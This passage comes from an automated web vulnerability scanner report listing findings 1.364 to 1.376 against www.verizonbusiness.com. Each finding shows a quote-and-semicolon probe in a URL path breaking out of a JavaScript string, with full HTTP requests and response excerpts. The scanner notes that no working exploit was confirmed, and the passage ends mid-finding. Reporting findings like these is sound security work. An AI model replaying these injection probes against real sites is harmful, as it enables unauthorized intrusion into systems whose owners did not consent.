GET /about58838"%3b4ded86453f0/news/media/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:37 GMT
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about58838";4ded86453f0/news/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.364. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a564'%3bf81c63b536d was submitted in the REST URL parameter 1. This input was echoed as 8a564';f81c63b536d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about8a564'%3bf81c63b536d/news/media/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about8a564';f81c63b536d/news/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.365. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd3fa"%3bdb463a634f5 was submitted in the REST URL parameter 2. This input was echoed as bd3fa";db463a634f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsbd3fa"%3bdb463a634f5/media/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:43 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47093
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsbd3fa";db463a634f5/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.366. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eaef4'%3b9542cc15bbc was submitted in the REST URL parameter 2. This input was echoed as eaef4';9542cc15bbc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newseaef4'%3b9542cc15bbc/media/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Date: Wed, 17 Nov 2010 00:52:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/newseaef4';9542cc15bbc/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.367. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad1ce'%3bc6528be2ef2 was submitted in the REST URL parameter 3. This input was echoed as ad1ce';c6528be2ef2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/mediaad1ce'%3bc6528be2ef2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49743
Date: Wed, 17 Nov 2010 00:53:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/mediaad1ce';c6528be2ef2/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.368. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54e6"%3b18d06262f83 was submitted in the REST URL parameter 3. This input was echoed as b54e6";18d06262f83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/mediab54e6"%3b18d06262f83/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:13 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49741
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/mediab54e6";18d06262f83/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.369. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba897"%3b7a99e9a7558 was submitted in the REST URL parameter 1. This input was echoed as ba897";7a99e9a7558 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutba897"%3b7a99e9a7558/news/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Date: Wed, 17 Nov 2010 00:51:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutba897";7a99e9a7558/news/network/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.370. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3044c'%3b54098f19c14 was submitted in the REST URL parameter 1. This input was echoed as 3044c';54098f19c14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about3044c'%3b54098f19c14/news/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about3044c';54098f19c14/news/network/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.371. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a5b5'%3bf9d0caef585 was submitted in the REST URL parameter 2. This input was echoed as 5a5b5';f9d0caef585 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news5a5b5'%3bf9d0caef585/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:56 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47097
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news5a5b5';f9d0caef585/network/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.372. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db39f"%3b127dbd848b5 was submitted in the REST URL parameter 2. This input was echoed as db39f";127dbd848b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsdb39f"%3b127dbd848b5/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47097
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsdb39f";127dbd848b5/network/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.373. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d3c'%3b1ccaec917f9 was submitted in the REST URL parameter 3. This input was echoed as 50d3c';1ccaec917f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/network50d3c'%3b1ccaec917f9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:20 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49745
Date: Wed, 17 Nov 2010 00:53:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/network50d3c';1ccaec917f9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.374. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4371"%3bae2e9acfa1 was submitted in the REST URL parameter 3. This input was echoed as e4371";ae2e9acfa1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/networke4371"%3bae2e9acfa1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:04 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49745
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/networke4371";ae2e9acfa1/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.375. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2341f"%3b5eb4bfdfa12 was submitted in the REST URL parameter 1. This input was echoed as 2341f";5eb4bfdfa12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about2341f"%3b5eb4bfdfa12/news/podcasts/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about2341f";5eb4bfdfa12/news/podcasts/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.376. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69114'%3b5d23fde5181 was submitted in the REST URL parameter 1. This input was echoed as 69114';5d23fde5181 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

